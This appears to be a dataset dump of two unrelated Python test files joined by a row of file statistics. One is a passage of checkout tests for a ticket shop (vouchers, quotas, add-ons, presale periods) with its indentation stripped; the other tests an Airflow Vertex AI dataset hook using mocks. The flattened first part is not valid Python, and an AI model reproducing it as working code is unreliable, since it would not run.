doc = BeautifulSoup(response.rendered_content, "lxml")
self.assertEqual(CartPosition.objects.filter(cart_id=self.session_key, voucher=v).count(), 1)
self.assertEqual(len(doc.select(".alert-danger")), 1)
self.assertFalse(Order.objects.exists())
response = self.client.post('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
doc = BeautifulSoup(response.rendered_content, "lxml")
self.assertFalse(CartPosition.objects.filter(cart_id=self.session_key, voucher=v).exists())
self.assertEqual(len(doc.select(".thank-you")), 1)
self.assertEqual(Order.objects.count(), 1)
self.assertEqual(OrderPosition.objects.count(), 1)
def test_max_per_item_failed(self):
self.quota_tickets.size = 3
self.quota_tickets.save()
self.ticket.max_per_order = 1
self.ticket.save()
CartPosition.objects.create(
event=self.event, cart_id=self.session_key, item=self.ticket,
price=23, expires=now() + timedelta(minutes=10),
)
CartPosition.objects.create(
event=self.event, cart_id=self.session_key, item=self.ticket,
price=23, expires=now() + timedelta(minutes=10),
)
self._set_session('payment', 'banktransfer')
response = self.client.post('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
doc = BeautifulSoup(response.rendered_content, "lxml")
self.assertEqual(CartPosition.objects.filter(cart_id=self.session_key).count(), 1)
self.assertEqual(len(doc.select(".alert-danger")), 1)
self.assertFalse(Order.objects.exists())
response = self.client.post('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
doc = BeautifulSoup(response.rendered_content, "lxml")
self.assertEqual(len(doc.select(".thank-you")), 1)
self.assertEqual(Order.objects.count(), 1)
self.assertEqual(OrderPosition.objects.count(), 1)
def test_subevent_confirm_expired_partial(self):
self.event.has_subevents = True
self.event.save()
se = self.event.subevents.create(name='Foo', date_from=now())
se2 = self.event.subevents.create(name='Foo', date_from=now())
self.quota_tickets.size = 10
self.quota_tickets.subevent = se2
self.quota_tickets.save()
q2 = se.quotas.create(event=self.event, size=1, name='Bar')
q2.items.add(self.ticket)
CartPosition.objects.create(
event=self.event, cart_id=self.session_key, item=self.ticket,
price=23, expires=now() - timedelta(minutes=10), subevent=se
)
CartPosition.objects.create(
event=self.event, cart_id=self.session_key, item=self.ticket,
price=23, expires=now() - timedelta(minutes=10), subevent=se
)
CartPosition.objects.create(
event=self.event, cart_id=self.session_key, item=self.ticket,
price=23, expires=now() - timedelta(minutes=10), subevent=se2
)
self._set_session('payment', 'banktransfer')
response = self.client.post('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
doc = BeautifulSoup(response.rendered_content, "lxml")
self.assertEqual(len(doc.select(".alert-danger")), 1)
self.assertEqual(CartPosition.objects.filter(cart_id=self.session_key).count(), 2)
def test_confirm_expired_partial(self):
self.quota_tickets.size = 1
self.quota_tickets.save()
CartPosition.objects.create(
event=self.event, cart_id=self.session_key, item=self.ticket,
price=23, expires=now() - timedelta(minutes=10)
)
CartPosition.objects.create(
event=self.event, cart_id=self.session_key, item=self.ticket,
price=23, expires=now() - timedelta(minutes=10)
)
self._set_session('payment', 'banktransfer')
response = self.client.post('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
doc = BeautifulSoup(response.rendered_content, "lxml")
self.assertEqual(len(doc.select(".alert-danger")), 1)
self.assertEqual(CartPosition.objects.filter(cart_id=self.session_key).count(), 1)
def test_confirm_presale_over(self):
self.event.presale_end = now() - datetime.timedelta(days=1)
self.event.save()
CartPosition.objects.create(
event=self.event, cart_id=self.session_key, item=self.ticket,
price=23, expires=now() + timedelta(minutes=10)
)
self._set_session('payment', 'banktransfer')
response = self.client.post('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
doc = BeautifulSoup(response.rendered_content, "lxml")
self.assertGreaterEqual(len(doc.select(".alert-danger")), 1)
def test_confirm_require_voucher(self):
self.ticket.require_voucher = True
self.ticket.save()
cr1 = CartPosition.objects.create(
event=self.event, cart_id=self.session_key, item=self.ticket,
price=23, expires=now() + timedelta(minutes=10)
)
self._set_session('payment', 'banktransfer')
response = self.client.post('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
doc = BeautifulSoup(response.rendered_content, "lxml")
self.assertGreaterEqual(len(doc.select(".alert-danger")), 1)
self.assertFalse(CartPosition.objects.filter(id=cr1.id).exists())
def test_confirm_require_hide_without_voucher(self):
self.ticket.require_voucher = True
self.ticket.save()
cr1 = CartPosition.objects.create(
event=self.event, cart_id=self.session_key, item=self.ticket,
price=23, expires=now() + timedelta(minutes=10)
)
self._set_session('payment', 'banktransfer')
response = self.client.post('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
doc = BeautifulSoup(response.rendered_content, "lxml")
self.assertGreaterEqual(len(doc.select(".alert-danger")), 1)
self.assertFalse(CartPosition.objects.filter(id=cr1.id).exists())
def test_confirm_inactive(self):
self.ticket.active = False
self.ticket.save()
cr1 = CartPosition.objects.create(
event=self.event, cart_id=self.session_key, item=self.ticket,
price=23, expires=now() - timedelta(minutes=10)
)
self._set_session('payment', 'banktransfer')
response = self.client.post('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
doc = BeautifulSoup(response.rendered_content, "lxml")
self.assertGreaterEqual(len(doc.select(".alert-danger")), 1)
self.assertFalse(CartPosition.objects.filter(id=cr1.id).exists())
def test_confirm_expired_unavailable(self):
self.quota_tickets.size = 0
self.quota_tickets.save()
cr1 = CartPosition.objects.create(
event=self.event, cart_id=self.session_key, item=self.ticket,
price=23, expires=now() - timedelta(minutes=10)
)
self._set_session('payment', 'banktransfer')
response = self.client.post('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
doc = BeautifulSoup(response.rendered_content, "lxml")
self.assertGreaterEqual(len(doc.select(".alert-danger")), 1)
self.assertFalse(CartPosition.objects.filter(id=cr1.id).exists())
def test_confirm_completely_unavailable(self):
self.quota_tickets.items.remove(self.ticket)
cr1 = CartPosition.objects.create(
event=self.event, cart_id=self.session_key, item=self.ticket,
price=23, expires=now() - timedelta(minutes=10)
)
self._set_session('payment', 'banktransfer')
response = self.client.post('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
doc = BeautifulSoup(response.rendered_content, "lxml")
self.assertGreaterEqual(len(doc.select(".alert-danger")), 1)
self.assertFalse(CartPosition.objects.filter(id=cr1.id).exists())
def test_confirm_expired_with_blocking_voucher_unavailable(self):
self.quota_tickets.size = 0
self.quota_tickets.save()
v = Voucher.objects.create(quota=self.quota_tickets, event=self.event, block_quota=True)
CartPosition.objects.create(
event=self.event, cart_id=self.session_key, item=self.ticket, voucher=v,
price=23, expires=now() - timedelta(minutes=10)
)
self._set_session('payment', 'banktransfer')
response = self.client.post('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
doc = BeautifulSoup(response.rendered_content, "lxml")
self.assertEqual(len(doc.select(".thank-you")), 1)
def test_confirm_expired_with_non_blocking_voucher_unavailable(self):
self.quota_tickets.size = 0
self.quota_tickets.save()
v = Voucher.objects.create(quota=self.quota_tickets, event=self.event)
cr1 = CartPosition.objects.create(
event=self.event, cart_id=self.session_key, item=self.ticket, voucher=v,
price=23, expires=now() - timedelta(minutes=10)
)
self._set_session('payment', 'banktransfer')
response = self.client.post('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
doc = BeautifulSoup(response.rendered_content, "lxml")
self.assertGreaterEqual(len(doc.select(".alert-danger")), 1)
self.assertFalse(CartPosition.objects.filter(id=cr1.id).exists())
def test_confirm_not_expired_with_blocking_voucher_unavailable(self):
self.quota_tickets.size = 0
self.quota_tickets.save()
v = Voucher.objects.create(quota=self.quota_tickets, event=self.event, block_quota=True)
CartPosition.objects.create(
event=self.event, cart_id=self.session_key, item=self.ticket, voucher=v,
price=23, expires=now() + timedelta(minutes=10)
)
self._set_session('payment', 'banktransfer')
response = self.client.post('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
doc = BeautifulSoup(response.rendered_content, "lxml")
self.assertEqual(len(doc.select(".thank-you")), 1)
def test_confirm_not_expired_with_non_blocking_voucher_unavailable(self):
self.quota_tickets.size = 0
self.quota_tickets.save()
v = Voucher.objects.create(quota=self.quota_tickets, event=self.event)
CartPosition.objects.create(
event=self.event, cart_id=self.session_key, item=self.ticket, voucher=v,
price=23, expires=now() + timedelta(minutes=10)
)
self._set_session('payment', 'banktransfer')
response = self.client.post('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
doc = BeautifulSoup(response.rendered_content, "lxml")
self.assertEqual(len(doc.select(".thank-you")), 1)
def test_addons_as_first_step(self):
ItemAddOn.objects.create(base_item=self.ticket, addon_category=self.workshopcat)
CartPosition.objects.create(
event=self.event, cart_id=self.session_key, item=self.ticket,
price=23, expires=now() - timedelta(minutes=10)
)
response = self.client.get('/%s/%s/checkout/start' % (self.orga.slug, self.event.slug), follow=True)
self.assertRedirects(response, '/%s/%s/checkout/addons/' % (self.orga.slug, self.event.slug),
target_status_code=200)
def test_set_addons_item_and_variation(self):
ItemAddOn.objects.create(base_item=self.ticket, addon_category=self.workshopcat)
cp1 = CartPosition.objects.create(
event=self.event, cart_id=self.session_key, item=self.ticket,
price=23, expires=now() - timedelta(minutes=10)
)
cp2 = CartPosition.objects.create(
event=self.event, cart_id=self.session_key, item=self.ticket,
price=23, expires=now() - timedelta(minutes=10)
)
response = self.client.post('/%s/%s/checkout/addons/' % (self.orga.slug, self.event.slug), {
'{}_{}-item_{}'.format(cp1.pk, self.workshopcat.pk, self.workshop1.pk): 'on',
'{}_{}-item_{}'.format(cp2.pk, self.workshopcat.pk, self.workshop2.pk): self.workshop2a.pk,
}, follow=True)
self.assertRedirects(response, '/%s/%s/checkout/questions/' % (self.orga.slug, self.event.slug),
target_status_code=200)
assert cp1.addons.first().item == self.workshop1
assert cp2.addons.first().item == self.workshop2
assert cp2.addons.first().variation == self.workshop2a
def test_set_addons_required(self):
ItemAddOn.objects.create(base_item=self.ticket, addon_category=self.workshopcat, min_count=1)
CartPosition.objects.create(
event=self.event, cart_id=self.session_key, item=self.ticket,
price=23, expires=now() - timedelta(minutes=10)
)
response = self.client.get('/%s/%s/checkout/questions/' % (self.orga.slug, self.event.slug))
self.assertRedirects(response, '/%s/%s/checkout/addons/' % (self.orga.slug, self.event.slug),
target_status_code=200)
response = self.client.get('/%s/%s/checkout/addons/' % (self.orga.slug, self.event.slug))
assert 'Workshop 1' in response.rendered_content
assert 'EUR 12.00' in response.rendered_content
def test_set_addons_included(self):
ItemAddOn.objects.create(base_item=self.ticket, addon_category=self.workshopcat, min_count=1,
price_included=True)
CartPosition.objects.create(
event=self.event, cart_id=self.session_key, item=self.ticket,
price=23, expires=now() - timedelta(minutes=10)
)
response = self.client.get('/%s/%s/checkout/questions/' % (self.orga.slug, self.event.slug), follow=True)
self.assertRedirects(response, '/%s/%s/checkout/addons/' % (self.orga.slug, self.event.slug),
target_status_code=200)
assert 'Workshop 1' in response.rendered_content
assert 'EUR 12.00' not in response.rendered_content
def test_set_addons_subevent(self):
self.event.has_subevents = True
self.event.save()
se = self.event.subevents.create(name='Foo', date_from=now())
self.workshopquota.size = 1
self.workshopquota.subevent = se
self.workshopquota.save()
SubEventItem.objects.create(subevent=se, item=self.workshop1, price=42)
ItemAddOn.objects.create(base_item=self.ticket, addon_category=self.workshopcat, min_count=1)
CartPosition.objects.create(
event=self.event, cart_id=self.session_key, item=self.ticket,
price=23, expires=now() - timedelta(minutes=10), subevent=se
)
response = self.client.get('/%s/%s/checkout/questions/' % (self.orga.slug, self.event.slug), follow=True)
self.assertRedirects(response, '/%s/%s/checkout/addons/' % (self.orga.slug, self.event.slug),
target_status_code=200)
assert 'Workshop 1 (+ EUR 42.00)' in response.rendered_content
def test_set_addons_subevent_net_prices(self):
self.event.has_subevents = True
self.event.settings.display_net_prices = True
self.event.save()
se = self.event.subevents.create(name='Foo', date_from=now())
self.workshopquota.size = 1
self.workshopquota.subevent = se
self.workshopquota.save()
self.workshop1.tax_rate = 19
self.workshop1.save()
self.workshop2.tax_rate = 19
self.workshop2.save()
SubEventItem.objects.create(subevent=se, item=self.workshop1, price=42)
ItemAddOn.objects.create(base_item=self.ticket, addon_category=self.workshopcat, min_count=1)
CartPosition.objects.create(
event=self.event, cart_id=self.session_key, item=self.ticket,
price=23, expires=now() - timedelta(minutes=10), subevent=se
)
response = self.client.get('/%s/%s/checkout/questions/' % (self.orga.slug, self.event.slug), follow=True)
self.assertRedirects(response, '/%s/%s/checkout/addons/' % (self.orga.slug, self.event.slug),
target_status_code=200)
assert 'Workshop 1 (+ EUR 35.29 plus 19.00% taxes)' in response.rendered_content
assert 'A (+ EUR 10.08 plus 19.00% taxes)' in response.rendered_content
def test_confirm_subevent_presale_not_yet(self):
self.event.has_subevents = True
self.event.settings.display_net_prices = True
self.event.save()
se = self.event.subevents.create(name='Foo', date_from=now(), presale_start=now() + datetime.timedelta(days=1))
CartPosition.objects.create(
event=self.event, cart_id=self.session_key, item=self.ticket,
price=23, expires=now() + timedelta(minutes=10), subevent=se
)
self._set_session('payment', 'banktransfer')
response = self.client.post('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
doc = BeautifulSoup(response.rendered_content, "lxml")
self.assertGreaterEqual(len(doc.select(".alert-danger")), 1)
assert 'presale period for one of the events in your cart has not yet started.' in response.rendered_content
assert not CartPosition.objects.filter(cart_id=self.session_key).exists()
def test_confirm_subevent_presale_over(self):
self.event.has_subevents = True
self.event.settings.display_net_prices = True
self.event.save()
se = self.event.subevents.create(name='Foo', date_from=now(), presale_end=now() - datetime.timedelta(days=1))
CartPosition.objects.create(
event=self.event, cart_id=self.session_key, item=self.ticket,
price=23, expires=now() + timedelta(minutes=10), subevent=se
)
self._set_session('payment', 'banktransfer')
response = self.client.post('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
doc = BeautifulSoup(response.rendered_content, "lxml")
self.assertGreaterEqual(len(doc.select(".alert-danger")), 1)
assert 'presale period for one of the events in your cart has ended.' in response.rendered_content
assert not CartPosition.objects.filter(cart_id=self.session_key).exists()
| 51.755597 | 119 | 0.641613 | 6,805 | 55,482 | 5.124173 | 0.043938 | 0.060396 | 0.038945 | 0.041296 | 0.914138 | 0.896673 | 0.892658 | 0.874591 | 0.859908 | 0.854316 | 0 | 0.017647 | 0.213547 | 55,482 | 1,071 | 120 | 51.803922 | 0.781501 | 0.005371 | 0 | 0.71016 | 0 | 0 | 0.097999 | 0.047667 | 0 | 0 | 0 | 0.000934 | 0.172193 | 1 | 0.057754 | false | 0 | 0.011765 | 0 | 0.070588 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
4ec23dc27bbfae448b8b9a4eccc4955a0df9d49a | 19,444 | py | Python | tests/providers/google/cloud/hooks/vertex_ai/test_dataset.py | npodewitz/airflow | 511ea702d5f732582d018dad79754b54d5e53f9d | [
"Apache-2.0"
] | 8,092 | 2016-04-27T20:32:29.000Z | 2019-01-05T07:39:33.000Z | tests/providers/google/cloud/hooks/vertex_ai/test_dataset.py | npodewitz/airflow | 511ea702d5f732582d018dad79754b54d5e53f9d | [
"Apache-2.0"
] | 2,961 | 2016-05-05T07:16:16.000Z | 2019-01-05T08:47:59.000Z | tests/providers/google/cloud/hooks/vertex_ai/test_dataset.py | npodewitz/airflow | 511ea702d5f732582d018dad79754b54d5e53f9d | [
"Apache-2.0"
] | 3,546 | 2016-05-04T20:33:16.000Z | 2019-01-05T05:14:26.000Z | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
from unittest import TestCase, mock
from google.api_core.gapic_v1.method import DEFAULT
from airflow.providers.google.cloud.hooks.vertex_ai.dataset import DatasetHook
from tests.providers.google.cloud.utils.base_gcp_mock import (
mock_base_gcp_hook_default_project_id,
mock_base_gcp_hook_no_default_project_id,
)
TEST_GCP_CONN_ID: str = "test-gcp-conn-id"
TEST_REGION: str = "test-region"
TEST_PROJECT_ID: str = "test-project-id"
TEST_PIPELINE_JOB: dict = {}
TEST_PIPELINE_JOB_ID: str = "test-pipeline-job-id"
TEST_TRAINING_PIPELINE: dict = {}
TEST_TRAINING_PIPELINE_NAME: str = "test-training-pipeline"
TEST_DATASET: dict = {}
TEST_DATASET_ID: str = "test-dataset-id"
TEST_EXPORT_CONFIG: dict = {}
TEST_ANNOTATION_SPEC: str = "test-annotation-spec"
TEST_IMPORT_CONFIGS: dict = {}
TEST_DATA_ITEM: str = "test-data-item"
TEST_UPDATE_MASK: dict = {}
BASE_STRING = "airflow.providers.google.common.hooks.base_google.{}"
DATASET_STRING = "airflow.providers.google.cloud.hooks.vertex_ai.dataset.{}"
class TestVertexAIWithDefaultProjectIdHook(TestCase):
def setUp(self):
with mock.patch(
BASE_STRING.format("GoogleBaseHook.__init__"), new=mock_base_gcp_hook_default_project_id
):
self.hook = DatasetHook(gcp_conn_id=TEST_GCP_CONN_ID)
@mock.patch(DATASET_STRING.format("DatasetHook.get_dataset_service_client"))
def test_create_dataset(self, mock_client) -> None:
self.hook.create_dataset(
project_id=TEST_PROJECT_ID,
region=TEST_REGION,
dataset=TEST_DATASET,
)
mock_client.assert_called_once_with(TEST_REGION)
mock_client.return_value.create_dataset.assert_called_once_with(
request=dict(
parent=mock_client.return_value.common_location_path.return_value,
dataset=TEST_DATASET,
),
metadata=(),
retry=DEFAULT,
timeout=None,
)
mock_client.return_value.common_location_path.assert_called_once_with(TEST_PROJECT_ID, TEST_REGION)
@mock.patch(DATASET_STRING.format("DatasetHook.get_dataset_service_client"))
def test_delete_dataset(self, mock_client) -> None:
self.hook.delete_dataset(
project_id=TEST_PROJECT_ID,
region=TEST_REGION,
dataset=TEST_DATASET_ID,
)
mock_client.assert_called_once_with(TEST_REGION)
mock_client.return_value.delete_dataset.assert_called_once_with(
request=dict(
name=mock_client.return_value.dataset_path.return_value,
),
metadata=(),
retry=DEFAULT,
timeout=None,
)
mock_client.return_value.dataset_path.assert_called_once_with(
TEST_PROJECT_ID, TEST_REGION, TEST_DATASET_ID
)
@mock.patch(DATASET_STRING.format("DatasetHook.get_dataset_service_client"))
def test_export_data(self, mock_client) -> None:
self.hook.export_data(
project_id=TEST_PROJECT_ID,
region=TEST_REGION,
dataset=TEST_DATASET_ID,
export_config=TEST_EXPORT_CONFIG,
)
mock_client.assert_called_once_with(TEST_REGION)
mock_client.return_value.export_data.assert_called_once_with(
request=dict(
name=mock_client.return_value.dataset_path.return_value,
export_config=TEST_EXPORT_CONFIG,
),
metadata=(),
retry=DEFAULT,
timeout=None,
)
mock_client.return_value.dataset_path.assert_called_once_with(
TEST_PROJECT_ID, TEST_REGION, TEST_DATASET_ID
)
@mock.patch(DATASET_STRING.format("DatasetHook.get_dataset_service_client"))
def test_get_annotation_spec(self, mock_client) -> None:
self.hook.get_annotation_spec(
project_id=TEST_PROJECT_ID,
region=TEST_REGION,
dataset=TEST_DATASET_ID,
annotation_spec=TEST_ANNOTATION_SPEC,
)
mock_client.assert_called_once_with(TEST_REGION)
mock_client.return_value.get_annotation_spec.assert_called_once_with(
request=dict(
name=mock_client.return_value.annotation_spec_path.return_value,
read_mask=None,
),
metadata=(),
retry=DEFAULT,
timeout=None,
)
mock_client.return_value.annotation_spec_path.assert_called_once_with(
TEST_PROJECT_ID, TEST_REGION, TEST_DATASET_ID, TEST_ANNOTATION_SPEC
)
@mock.patch(DATASET_STRING.format("DatasetHook.get_dataset_service_client"))
def test_get_dataset(self, mock_client) -> None:
self.hook.get_dataset(
project_id=TEST_PROJECT_ID,
region=TEST_REGION,
dataset=TEST_DATASET_ID,
)
mock_client.assert_called_once_with(TEST_REGION)
mock_client.return_value.get_dataset.assert_called_once_with(
request=dict(
name=mock_client.return_value.dataset_path.return_value,
read_mask=None,
),
metadata=(),
retry=DEFAULT,
timeout=None,
)
mock_client.return_value.dataset_path.assert_called_once_with(
TEST_PROJECT_ID, TEST_REGION, TEST_DATASET_ID
)
@mock.patch(DATASET_STRING.format("DatasetHook.get_dataset_service_client"))
def test_import_data(self, mock_client) -> None:
self.hook.import_data(
project_id=TEST_PROJECT_ID,
region=TEST_REGION,
dataset=TEST_DATASET_ID,
import_configs=TEST_IMPORT_CONFIGS,
)
mock_client.assert_called_once_with(TEST_REGION)
mock_client.return_value.import_data.assert_called_once_with(
request=dict(
name=mock_client.return_value.dataset_path.return_value,
import_configs=TEST_IMPORT_CONFIGS,
),
metadata=(),
retry=DEFAULT,
timeout=None,
)
mock_client.return_value.dataset_path.assert_called_once_with(
TEST_PROJECT_ID, TEST_REGION, TEST_DATASET_ID
)
@mock.patch(DATASET_STRING.format("DatasetHook.get_dataset_service_client"))
def test_list_annotations(self, mock_client) -> None:
self.hook.list_annotations(
project_id=TEST_PROJECT_ID,
region=TEST_REGION,
dataset=TEST_DATASET_ID,
data_item=TEST_DATA_ITEM,
)
mock_client.assert_called_once_with(TEST_REGION)
mock_client.return_value.list_annotations.assert_called_once_with(
request=dict(
parent=mock_client.return_value.data_item_path.return_value,
filter=None,
page_size=None,
page_token=None,
read_mask=None,
order_by=None,
),
metadata=(),
retry=DEFAULT,
timeout=None,
)
mock_client.return_value.data_item_path.assert_called_once_with(
TEST_PROJECT_ID, TEST_REGION, TEST_DATASET_ID, TEST_DATA_ITEM
)
@mock.patch(DATASET_STRING.format("DatasetHook.get_dataset_service_client"))
def test_list_data_items(self, mock_client) -> None:
self.hook.list_data_items(
project_id=TEST_PROJECT_ID,
region=TEST_REGION,
dataset=TEST_DATASET_ID,
)
mock_client.assert_called_once_with(TEST_REGION)
mock_client.return_value.list_data_items.assert_called_once_with(
request=dict(
parent=mock_client.return_value.dataset_path.return_value,
filter=None,
page_size=None,
page_token=None,
read_mask=None,
order_by=None,
),
metadata=(),
retry=DEFAULT,
timeout=None,
)
mock_client.return_value.dataset_path.assert_called_once_with(
TEST_PROJECT_ID, TEST_REGION, TEST_DATASET_ID
)
@mock.patch(DATASET_STRING.format("DatasetHook.get_dataset_service_client"))
def test_list_datasets(self, mock_client) -> None:
self.hook.list_datasets(
project_id=TEST_PROJECT_ID,
region=TEST_REGION,
)
mock_client.assert_called_once_with(TEST_REGION)
mock_client.return_value.list_datasets.assert_called_once_with(
request=dict(
parent=mock_client.return_value.common_location_path.return_value,
filter=None,
page_size=None,
page_token=None,
read_mask=None,
order_by=None,
),
metadata=(),
retry=DEFAULT,
timeout=None,
)
mock_client.return_value.common_location_path.assert_called_once_with(TEST_PROJECT_ID, TEST_REGION)
@mock.patch(DATASET_STRING.format("DatasetHook.get_dataset_service_client"))
def test_update_dataset(self, mock_client) -> None:
self.hook.update_dataset(
project_id=TEST_PROJECT_ID,
region=TEST_REGION,
dataset_id=TEST_DATASET_ID,
dataset=TEST_DATASET,
update_mask=TEST_UPDATE_MASK,
)
mock_client.assert_called_once_with(TEST_REGION)
mock_client.return_value.update_dataset.assert_called_once_with(
request=dict(
dataset=TEST_DATASET,
update_mask=TEST_UPDATE_MASK,
),
metadata=(),
retry=DEFAULT,
timeout=None,
)
mock_client.return_value.dataset_path.assert_called_once_with(
TEST_PROJECT_ID, TEST_REGION, TEST_DATASET_ID
)
class TestVertexAIWithoutDefaultProjectIdHook(TestCase):
def setUp(self):
with mock.patch(
BASE_STRING.format("GoogleBaseHook.__init__"), new=mock_base_gcp_hook_no_default_project_id
):
self.hook = DatasetHook(gcp_conn_id=TEST_GCP_CONN_ID)
@mock.patch(DATASET_STRING.format("DatasetHook.get_dataset_service_client"))
def test_create_dataset(self, mock_client) -> None:
self.hook.create_dataset(
project_id=TEST_PROJECT_ID,
region=TEST_REGION,
dataset=TEST_DATASET,
)
mock_client.assert_called_once_with(TEST_REGION)
mock_client.return_value.create_dataset.assert_called_once_with(
request=dict(
parent=mock_client.return_value.common_location_path.return_value,
dataset=TEST_DATASET,
),
metadata=(),
retry=DEFAULT,
timeout=None,
)
mock_client.return_value.common_location_path.assert_called_once_with(TEST_PROJECT_ID, TEST_REGION)
@mock.patch(DATASET_STRING.format("DatasetHook.get_dataset_service_client"))
def test_delete_dataset(self, mock_client) -> None:
self.hook.delete_dataset(
project_id=TEST_PROJECT_ID,
region=TEST_REGION,
dataset=TEST_DATASET_ID,
)
mock_client.assert_called_once_with(TEST_REGION)
mock_client.return_value.delete_dataset.assert_called_once_with(
request=dict(
name=mock_client.return_value.dataset_path.return_value,
),
metadata=(),
retry=DEFAULT,
timeout=None,
)
mock_client.return_value.dataset_path.assert_called_once_with(
TEST_PROJECT_ID, TEST_REGION, TEST_DATASET_ID
)
@mock.patch(DATASET_STRING.format("DatasetHook.get_dataset_service_client"))
def test_export_data(self, mock_client) -> None:
self.hook.export_data(
project_id=TEST_PROJECT_ID,
region=TEST_REGION,
dataset=TEST_DATASET_ID,
export_config=TEST_EXPORT_CONFIG,
)
mock_client.assert_called_once_with(TEST_REGION)
mock_client.return_value.export_data.assert_called_once_with(
request=dict(
name=mock_client.return_value.dataset_path.return_value,
export_config=TEST_EXPORT_CONFIG,
),
metadata=(),
retry=DEFAULT,
timeout=None,
)
mock_client.return_value.dataset_path.assert_called_once_with(
TEST_PROJECT_ID, TEST_REGION, TEST_DATASET_ID
)
@mock.patch(DATASET_STRING.format("DatasetHook.get_dataset_service_client"))
def test_get_annotation_spec(self, mock_client) -> None:
self.hook.get_annotation_spec(
project_id=TEST_PROJECT_ID,
region=TEST_REGION,
dataset=TEST_DATASET_ID,
annotation_spec=TEST_ANNOTATION_SPEC,
)
mock_client.assert_called_once_with(TEST_REGION)
mock_client.return_value.get_annotation_spec.assert_called_once_with(
request=dict(
name=mock_client.return_value.annotation_spec_path.return_value,
read_mask=None,
),
metadata=(),
retry=DEFAULT,
timeout=None,
)
mock_client.return_value.annotation_spec_path.assert_called_once_with(
TEST_PROJECT_ID, TEST_REGION, TEST_DATASET_ID, TEST_ANNOTATION_SPEC
)
@mock.patch(DATASET_STRING.format("DatasetHook.get_dataset_service_client"))
def test_get_dataset(self, mock_client) -> None:
self.hook.get_dataset(
project_id=TEST_PROJECT_ID,
region=TEST_REGION,
dataset=TEST_DATASET_ID,
)
mock_client.assert_called_once_with(TEST_REGION)
mock_client.return_value.get_dataset.assert_called_once_with(
request=dict(
name=mock_client.return_value.dataset_path.return_value,
read_mask=None,
),
metadata=(),
retry=DEFAULT,
timeout=None,
)
mock_client.return_value.dataset_path.assert_called_once_with(
TEST_PROJECT_ID, TEST_REGION, TEST_DATASET_ID
)
@mock.patch(DATASET_STRING.format("DatasetHook.get_dataset_service_client"))
def test_import_data(self, mock_client) -> None:
self.hook.import_data(
project_id=TEST_PROJECT_ID,
region=TEST_REGION,
dataset=TEST_DATASET_ID,
import_configs=TEST_IMPORT_CONFIGS,
)
mock_client.assert_called_once_with(TEST_REGION)
mock_client.return_value.import_data.assert_called_once_with(
request=dict(
name=mock_client.return_value.dataset_path.return_value,
import_configs=TEST_IMPORT_CONFIGS,
),
metadata=(),
retry=DEFAULT,
timeout=None,
)
mock_client.return_value.dataset_path.assert_called_once_with(
TEST_PROJECT_ID, TEST_REGION, TEST_DATASET_ID
)
@mock.patch(DATASET_STRING.format("DatasetHook.get_dataset_service_client"))
def test_list_annotations(self, mock_client) -> None:
self.hook.list_annotations(
project_id=TEST_PROJECT_ID,
region=TEST_REGION,
dataset=TEST_DATASET_ID,
data_item=TEST_DATA_ITEM,
)
mock_client.assert_called_once_with(TEST_REGION)
mock_client.return_value.list_annotations.assert_called_once_with(
request=dict(
parent=mock_client.return_value.data_item_path.return_value,
filter=None,
page_size=None,
page_token=None,
read_mask=None,
order_by=None,
),
metadata=(),
retry=DEFAULT,
timeout=None,
)
mock_client.return_value.data_item_path.assert_called_once_with(
TEST_PROJECT_ID, TEST_REGION, TEST_DATASET_ID, TEST_DATA_ITEM
)
@mock.patch(DATASET_STRING.format("DatasetHook.get_dataset_service_client"))
def test_list_data_items(self, mock_client) -> None:
self.hook.list_data_items(
project_id=TEST_PROJECT_ID,
region=TEST_REGION,
dataset=TEST_DATASET_ID,
)
mock_client.assert_called_once_with(TEST_REGION)
mock_client.return_value.list_data_items.assert_called_once_with(
request=dict(
parent=mock_client.return_value.dataset_path.return_value,
filter=None,
page_size=None,
page_token=None,
read_mask=None,
order_by=None,
),
metadata=(),
retry=DEFAULT,
timeout=None,
)
mock_client.return_value.dataset_path.assert_called_once_with(
TEST_PROJECT_ID, TEST_REGION, TEST_DATASET_ID
)
@mock.patch(DATASET_STRING.format("DatasetHook.get_dataset_service_client"))
def test_list_datasets(self, mock_client) -> None:
self.hook.list_datasets(
project_id=TEST_PROJECT_ID,
region=TEST_REGION,
)
mock_client.assert_called_once_with(TEST_REGION)
mock_client.return_value.list_datasets.assert_called_once_with(
request=dict(
parent=mock_client.return_value.common_location_path.return_value,
filter=None,
page_size=None,
page_token=None,
read_mask=None,
order_by=None,
),
metadata=(),
retry=DEFAULT,
timeout=None,
)
